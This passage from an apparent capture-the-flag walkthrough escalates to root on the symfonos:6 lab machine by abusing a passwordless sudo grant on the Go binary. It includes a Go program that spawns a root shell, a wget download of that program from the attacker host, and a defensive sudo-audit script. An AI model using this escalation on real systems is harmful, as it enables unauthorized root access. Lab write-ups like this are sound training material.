    !visiblepw, always_set_home, match_group_by_gid, env_reset,                                                                                           
    env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",                                                                                         
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",                                                                                     
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",                                                                                  
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",                                                                                     
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",                                                                                  
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin                                                                                                          
                                                                                                                                                          
User achilles may run the following commands on symfonos6:                                                                                                
    (ALL) NOPASSWD: /usr/local/go/bin/go
[achilles@symfonos6 ~]$ 

The output reveals that the Achilles user is allowed to execute the /usr/local/go/bin/go command as root without requiring a password.

The go command, part of the Go programming language environment, can be leveraged to execute arbitrary commands or scripts. 

This provides a direct pathway to escalate privileges and gain root access by crafting and executing a malicious Go script.
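The sudoers weakness above is easy to audit for on any host. As an added example (not part of the walkthrough), here is a small Go program that parses the grant lines of sudo -l output and flags entries that hand a code-running binary such as go to root; SudoRule, codeRunners, ParseSudoL, RiskyGrants and the sample input are all assumptions of this example, and the sample is constructed from the grants shown above plus one narrowly scoped grant for contrast.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// SudoRule is one "(runas) TAGS: command" grant parsed from `sudo -l` output.
type SudoRule struct {
	RunAs    string // text inside the (...) prefix, e.g. "ALL"
	NoPasswd bool   // NOPASSWD: tag present
	Command  string // granted command path, or "ALL"
}
// Binaries that run caller-supplied code: a root grant on any of them is a root shell (assumed list).
var codeRunners = map[string]bool{"go": true, "python": true, "python3": true, "perl": true, "ruby": true, "node": true, "bash": true, "sh": true}
// SampleSudoL is constructed from the walkthrough's sudo -l grants, plus one narrowly scoped grant for contrast.
const SampleSudoL = "    (ALL) NOPASSWD: /usr/local/go/bin/go\n    (root) /usr/bin/systemctl restart httpd\n"

// ParseSudoL extracts grant lines; Defaults lines never start with "(" and are skipped.
func ParseSudoL(output string) (rules []SudoRule) {
	for _, line := range strings.Split(output, "\n") {
		line = strings.TrimSpace(line)
		end := strings.Index(line, ")")
		if !strings.HasPrefix(line, "(") || end < 0 {
			continue
		}
		rule := SudoRule{RunAs: line[1:end]}
		for _, tok := range strings.Fields(line[end+1:]) { // tags end with ':' and precede the command
			if rule.NoPasswd = rule.NoPasswd || tok == "NOPASSWD:"; !strings.HasSuffix(tok, ":") {
				rule.Command = tok
				rules = append(rules, rule)
				break
			}
		}
	}
	return rules
}

// RiskyGrants returns rules equivalent to arbitrary code execution as the run-as user; secure_path and env_reset do not mitigate them.
func RiskyGrants(rules []SudoRule) (out []SudoRule) {
	for _, r := range rules {
		if r.Command == "ALL" || codeRunners[path.Base(r.Command)] {
			out = append(out, r)
		}
	}
	return out
}

func main() {
	for _, r := range RiskyGrants(ParseSudoL(SampleSudoL)) {
		fmt.Printf("RISK: %s as (%s) nopasswd=%t\n", r.Command, r.RunAs, r.NoPasswd)
	}
}
```

Feeding it the real output of sudo -l (for example via os.Stdin) turns it into a quick check to run during a host review or in a configuration-management test.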


Privilege Escalation via Misconfigured Sudo Permissions on Go Binary

First, let's change the directory to the /tmp directory. 

[achilles@symfonos6 ~]$ cd /tmp
cd /tmp                                                                                                                                                   
[achilles@symfonos6 tmp]$

Here, we need a Go program that spawns a root shell when it is executed. On the attacking machine, open a text editor, create a new file, add the following code and save it as root_shell.go.

package main

import (
    "os"
    "os/exec"
)

// Spawns /bin/bash wired to the current terminal. When compiled and run by
// "sudo go run", the child process inherits root, so the shell that opens is root's.
func main() {
    cmd := exec.Command("/bin/bash") // exec.Command (capital C): Go exports are case-sensitive, exec.command does not compile
    cmd.Stdin = os.Stdin
    cmd.Stdout = os.Stdout
    cmd.Stderr = os.Stderr
    cmd.Run()
}

Now, we need to transfer this script to the target machine. If you recall, we had already started the HTTP server earlier to host the JavaScript file used in exploiting Flyspray.

Switch back to the target machine where we previously navigated to the /tmp directory. Use the wget command to download the script from our attacking machine.

[achilles@symfonos6 tmp]$ wget http://192.168.103.3:8000/root_shell.go                                                                                    
wget http://192.168.103.3:8000/root_shell.go                                                                                                              
--2024-12-01 15:03:32--  http://192.168.103.3:8000/root_shell.go                                                                                          
Connecting to 192.168.103.3:8000... connected.                                                                                                            
HTTP request sent, awaiting response... 200 OK                                                                                                            
Length: 195 [application/octet-stream]                                                                                                                    
Saving to: 'root_shell.go'                                                                                                                                
                                                                                                                                                          
100%[======================================>] 195         --.-K/s   in 0s                                                                                 
                                                                                                                                                          
2024-12-01 15:03:32 (31.5 MB/s) - 'root_shell.go' saved [195/195]                                                                                         
                                                                                                                                                          
[achilles@symfonos6 tmp]$

Once the script is downloaded, execute it with elevated privileges using sudo /usr/local/go/bin/go run <go_script>.

[achilles@symfonos6 tmp]$ ls -al                                                                                                                          
ls -al                                                                                                                                                    
total 28                                                                                                                                                  
drwxrwxrwt. 26 root     root      8192 Dec  1 15:03 .                                                                                                     
dr-xr-xr-x. 17 root     root       224 Mar 30  2020 ..                                                                                                    
-rw-rw-r--   1 achilles achilles   195 Dec  1 15:02 root_shell.go
[achilles@symfonos6 tmp]$ sudo /usr/local/go/bin/go run root_shell.go
sudo /usr/local/go/bin/go run root_shell.go                                                                                                               
[root@symfonos6 tmp]# 

When the script runs successfully, it should spawn a root shell. To verify the access level, run the whoami command.

[root@symfonos6 tmp]# whoami                                                                                                                              
whoami                                                                                                                                                    
root                                                                                                                                                      
[root@symfonos6 tmp]# 

Finally, navigate to the /root directory to locate and retrieve the root flag.

[root@symfonos6 tmp]# cd /root                                                                                                                            
cd /root                                                                                                                                                  
[root@symfonos6 ~]# ls -al                                                                                                                                
ls -al                                                                                                                                                    
total 32                                                                                                                                                  
dr-xr-x---.  6 root root  238 Apr  6  2020 .                                                                                                              
dr-xr-xr-x. 17 root root  224 Mar 30  2020 ..                                                                                                             
lrwxrwxrwx   1 root root    9 Mar 30  2020 .bash_history -> /dev/null                                                                                     
-rw-r--r--.  1 root root   18 Dec 28  2013 .bash_logout                                                                                                   
-rw-r--r--.  1 root root  176 Dec 28  2013 .bash_profile                                                                                                  
-rw-r--r--.  1 root root  176 Dec 28  2013 .bashrc                                                                                                        
drwx------   3 root root   17 Mar 30  2020 .cache                                                                                                         
-rw-r--r--.  1 root root  100 Dec 28  2013 .cshrc                                                                                                         
-rw-r--r--   1 root root   57 Apr  2  2020 .gitconfig                                                                                                     
lrwxrwxrwx   1 root root    9 Apr  2  2020 .mysql_history -> /dev/null                                                                                    
drwxr-----   3 root root   19 Mar 30  2020 .pki                                                                                                           
drwxr-xr-x   2 root root   29 Apr  3  2020 .ssh                                                                                                           
-rw-r--r--.  1 root root  129 Dec 28  2013 .tcshrc                                                                                                        
-rw-------   1 root root 1555 Apr  6  2020 .viminfo                                                                                                       
-rw-r--r--   1 root root  592 Apr  2  2020 proof.txt                                                                                                      
drwxr-x---   2 root root   24 Apr  4  2020 scripts                                                                                                        
[root@symfonos6 ~]# cat proof.txt
cat proof.txt                                                                                                                                             
                                                                                                                                                          
           Congrats on rooting symfonos:6!                                                                                                                
                  ,_---~~~~~----._                                                                                                                        
           _,,_,*^____      _____``*g*\"*,                                                                                                                
          / __/ /'     ^.  /      \ ^@q   f                                                                                                               
         [  @f | @))    |  | @))   l  0 _/                                                                                                                
          \`/   \~____ / __ \_____/    \                                                                                                                  
           |           _l__l_           I                                                                                                                 
           }          [______]           I                                                                                                                
           ]            | | |            |                                                                                                                
           ]             ~ ~             |                                                                                                                
           |                            |                                                                                                                 
            |                           |                                                                                                                 
     Contact me via Twitter @zayotic to give feedback!                                                                                                    
                                                                                                                                                          
[root@symfonos6 ~]# 

